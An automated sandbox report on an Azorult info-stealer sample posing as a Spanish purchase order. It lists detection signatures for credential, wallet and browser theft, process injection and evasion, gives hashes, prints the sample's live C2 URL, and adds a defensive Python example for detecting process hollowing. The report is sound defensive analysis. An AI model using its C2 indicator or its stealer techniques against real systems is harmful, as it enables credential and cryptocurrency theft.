Windows Analysis Report
NUEVA ORDEN-MATSA 10-2022,.exe

Overview

General Information

Sample Name: NUEVA ORDEN-MATSA 10-2022,.exe
Analysis ID: 715078
MD5: 5bb547610939ac07657f6216a28498cb
SHA1: 89eadfa478804f0a5798e26871ff45c4906349ee
SHA256: 3d70466e2cb7b2b051feb16750acb3b40af81f4595a0c0ffa865c13907820ca2
Tags: AZORult, exe

Detection

Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Azorult Info Stealer
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
DLL side loading technique detected
Tries to harvest and steal Bitcoin Wallet information
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file name differs from the original file name in its version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
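The injection-related signatures in the list above (a child created suspended, memory allocated and written in a foreign process, a PE image in the written buffer, the thread resumed) are individually weak; a confident call comes from correlating them per source/target pair, which is what turns the sample spawning cvtres.exe into a process-hollowing verdict. The following Python is an added example, not part of the Joe Sandbox report or its engine. The trace format is a constructed simplification, and the process indices (0 for the sample, 1 for cvtres.exe) mirror the ones used in this report:

```python
"""Correlate a process API trace into the injection chain this report flags.

Added example, not part of the Joe Sandbox report. The trace format
(source pid, API name, argument dict) is a constructed simplification;
EDR and sandbox traces carry the same fields under other names.
"""
from collections import defaultdict
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004      # CreateProcess dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40      # VirtualAllocEx flProtect value

# Constructed trace. Process index 0 is the submitted sample and 1 the
# cvtres.exe it spawns, mirroring the indices used in this report.
SAMPLE_TRACE = [
    (0, "CreateProcessW", {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
                           "flags": CREATE_SUSPENDED, "new_pid": 1}),
    (0, "VirtualAllocEx", {"target_pid": 1, "addr": 0x400000, "size": 0x38000,
                           "protect": PAGE_EXECUTE_READWRITE}),
    (0, "WriteProcessMemory", {"target_pid": 1, "addr": 0x400000,
                               "data": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56}),
    (0, "WriteProcessMemory", {"target_pid": 1, "addr": 0x401000,
                               "data": b"\x55\x8b\xec\x83\xec"}),
    (0, "SetThreadContext", {"target_pid": 1}),
    (0, "ResumeThread", {"target_pid": 1}),
    # Noise: a process allocating in its own address space is not injection.
    (1, "VirtualAlloc", {"addr": 0x7A00000, "size": 0x1000, "protect": 0x04}),
]


@dataclass
class InjectionState:
    """What one source process has done to one target process."""
    image: str = ""
    suspended: bool = False
    rwx_allocations: int = 0
    foreign_writes: int = 0
    pe_header_written: bool = False
    context_set: bool = False
    resumed: bool = False


def correlate(trace):
    """Group cross-process events by (source pid, target pid)."""
    states = defaultdict(InjectionState)
    for src, api, args in trace:
        if api in ("CreateProcessW", "CreateProcessA"):
            st = states[(src, args["new_pid"])]
            st.image = args.get("image", "")
            st.suspended = bool(args.get("flags", 0) & CREATE_SUSPENDED)
            continue
        target = args.get("target_pid")
        if target is None or target == src:
            continue                      # same-process activity is out of scope
        st = states[(src, target)]
        if api == "VirtualAllocEx" and args.get("protect") == PAGE_EXECUTE_READWRITE:
            st.rwx_allocations += 1
        elif api == "WriteProcessMemory":
            st.foreign_writes += 1
            if args.get("data", b"")[:2] == b"MZ":   # DOS header at the start of the buffer
                st.pe_header_written = True
        elif api == "SetThreadContext":
            st.context_set = True
        elif api == "ResumeThread":
            st.resumed = True
    return dict(states)


def matched_signatures(st):
    """Map the correlated state onto the signature names used in this report."""
    sigs = []
    if st.suspended:
        sigs.append("Creates a process in suspended mode (likely to inject code)")
    if st.rwx_allocations:
        sigs.append("Allocates memory in foreign processes")
    if st.foreign_writes:
        sigs.append("Writes to foreign memory regions")
    if st.pe_header_written:
        sigs.append("Injects a PE file into a foreign process")
    return sigs


def is_process_hollowing(st):
    """Suspended child, a PE image written into it, then the thread resumed:
    that chain is hollowing; each step alone has benign explanations."""
    return st.suspended and st.pe_header_written and st.resumed


if __name__ == "__main__":
    for (src, dst), st in correlate(SAMPLE_TRACE).items():
        print(f"{src} -> {dst} ({st.image or '?'}): hollowing={is_process_hollowing(st)}")
        for s in matched_signatures(st):
            print("  ", s)
```

Keying the state on the (source, target) pair is what keeps the same-process VirtualAlloc noise out of the verdict; in a real telemetry pipeline the target image name (here a .NET Framework tool that never needs a new PE written into it) is the second strong discriminator.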

Classification

AV Detection

Source: NUEVA ORDEN-MATSA 10-2022,.exe ReversingLabs: Detection: 27%
Source: NUEVA ORDEN-MATSA 10-2022,.exe Avira: detected
Source: NUEVA ORDEN-MATSA 10-2022,.exe Joe Sandbox ML: detected
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Azorult {"C2 url": "http://cinho.shop/PL341/index.php"}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004094C4 CryptUnprotectData,LocalFree, 1_2_004094C4
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283784153.000000000825C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283874998.0000000008260000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268070409.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268608129.0000000007888000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268551087.0000000007884000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284321181.0000000007528000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: cvtres.exe, 00000001.00000003.271250139.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270748656.00000000084D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277992608.00000000081D8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.265401720.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264246608.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267015957.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283746313.0000000008250000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267832549.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268762769.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284414482.00000000075F0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278187484.00000000081EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.264827087.0000000008398000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283512359.0000000008234000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283598432.0000000008238000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267278671.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283409391.000000000822C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283458551.0000000008230000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283030101.000000000821C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283366893.0000000008228000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266752483.0000000008394000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283196066.0000000008220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283698525.000000000824C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267651225.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cvtres.exe, 00000001.00000003.276245137.00000000066AC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.290995859.0000000007858000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: cvtres.exe, 00000001.00000003.269785480.00000000078CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287248341.000000000765C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269714098.0000000007880000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.265957997.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269369848.00000000078D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286974853.0000000007608000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.286617765.0000000007604000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269057239.0000000007878000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.269503745.0000000007880000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.268301473.000000000788C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.268329300.0000000007874000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.284181718.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.264406495.0000000008398000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277974574.00000000081D4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277832553.00000000081D0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277589930.00000000081C4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277807355.00000000081CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.277654923.00000000081C8000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.283618817.0000000008244000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.283672079.0000000008248000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.267505452.0000000008394000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\NMCVXCXMXKJDFGDJKJDF.pdb source: NUEVA ORDEN-MATSA 10-2022,.exe
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cvtres.exe, 00000001.00000003.272644545.00000000066CC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272757796.00000000066A4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289559436.0000000007834000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: msvcp140.i386.pdb source: cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270034811.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.270237118.0000000006694000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.282787916.0000000008218000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278525765.0000000008210000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.266283140.0000000007870000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278457897.0000000008208000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278497281.000000000820C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278263471.0000000008204000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278671132.0000000008214000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: cvtres.exe, 00000001.00000003.273084362.00000000084C0000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289682200.0000000008280000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.275089189.00000000083A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.284438762.00000000075FC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.285608637.0000000007600000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: cvtres.exe, 00000001.00000003.289068722.00000000076EC000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.289451882.000000000781C000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.287286269.0000000007684000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.306509840.0000000007E30000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272309123.0000000006694000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.272210606.00000000083A0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: cvtres.exe, 00000001.00000003.278062158.00000000081E8000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.278006231.00000000081E4000.00000004.00001000.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.303799165.0000000007A00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BROTHERS.pdbBSJB source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp
